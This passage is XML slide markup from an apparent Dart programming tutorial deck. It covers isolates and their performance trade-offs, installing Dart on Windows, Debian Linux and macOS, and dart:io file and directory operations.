            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Spawn Isolate</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-214313" lvl="0" marL="214313" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Listen/wait message from isolate</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-214313" lvl="0" marL="214313" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>runIsolate: function/code the isolate will excute and then finish.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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143500" y="1624013"/>
            <a:ext cx="3143249" cy="2662237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Performance &amp; Optimization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308460" y="654702"/>
            <a:ext cx="5296781" cy="3769657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1350"/>
              <a:t>Efficiency</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>: Highly efficient in utilizing multiple CPU cores. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Separate heap, no shared memory -&gt; No overhead for synchronisation.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1350"/>
              <a:t>Memory Consumption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>: Each isolate has its own memory and execution stack, which can lead to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="1350"/>
              <a:t>higher memory usage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t> if many isolates are spawned.</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1350"/>
              <a:t>Use Cases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>: Best suited for parallel CPU-intensive tasks or operations without blocking the main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>isolate’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t> flow.</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1350"/>
              <a:t>No Locks Needed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>: Avoid common problems (deadlocks).</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1350"/>
              <a:t>Communication Overhead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>: Message passing between isolates can have overhead, especially for large data.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t> Advice: Pass simple messages or serialized data.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="135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13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="66518" l="0" r="52315" t="12638"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="597350" y="1279475"/>
            <a:ext cx="7208425" cy="1827399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479775" y="176400"/>
            <a:ext cx="2798700" cy="635100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Windows install</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="667925" y="3574850"/>
            <a:ext cx="5726700" cy="705600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1850">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Simple install using the chocolatey package manager</a:t>
            </a:r>
            <a:endParaRPr sz="23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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6439303" y="4107428"/>
            <a:ext cx="2643859" cy="639042"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1350" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A bit more complicated, need to add Dart’s package sources to our  system’s package sources list</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5183400" cy="639000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2900">
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>Linux install (Debian based) </a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Google Shape;151;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="879600" y="1124800"/>
            <a:ext cx="48684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First add dart to our package source list</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="152" name="Google Shape;152;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="2808" r="0" t="36848"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="809050" y="1622797"/>
            <a:ext cx="6846025" cy="1507750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Google Shape;153;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809050" y="3036950"/>
            <a:ext cx="5244600" cy="63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Then we can install it using apt-get</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="154" name="Google Shape;154;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="809050" y="3530825"/>
            <a:ext cx="5686425" cy="1162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2a0d279bb21_0_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Mac OS installation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Google Shape;160;g2a0d279bb21_0_8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Installation using the homebrew package manager</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;g2a0d279bb21_0_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pic>
        <p:nvPicPr>
          <p:cNvPr id="162" name="Google Shape;162;g2a0d279bb21_0_86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4519" l="12610" r="0" t="44921"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="479750" y="1646300"/>
            <a:ext cx="6376199" cy="1516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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4332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dart:io library</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="4001700" cy="3737100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> operations:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Represents a file on the file system and provides methods for reading and writing to it.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Represents a directory on the file system and allows for directory manipulation</a:t>
            </a:r>
            <a:endParaRPr sz="1100">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Reading and Writing Files:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>File.readAsString()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Reads the contents of a file as a string.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>File.readAsBytes()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Reads the contents of a file as a list of bytes.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>File.writeAsString()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Writes a string to a file.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>File.writeAsBytes()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Writes a list of bytes to a file.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Google Shape;169;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4689600" y="632650"/>
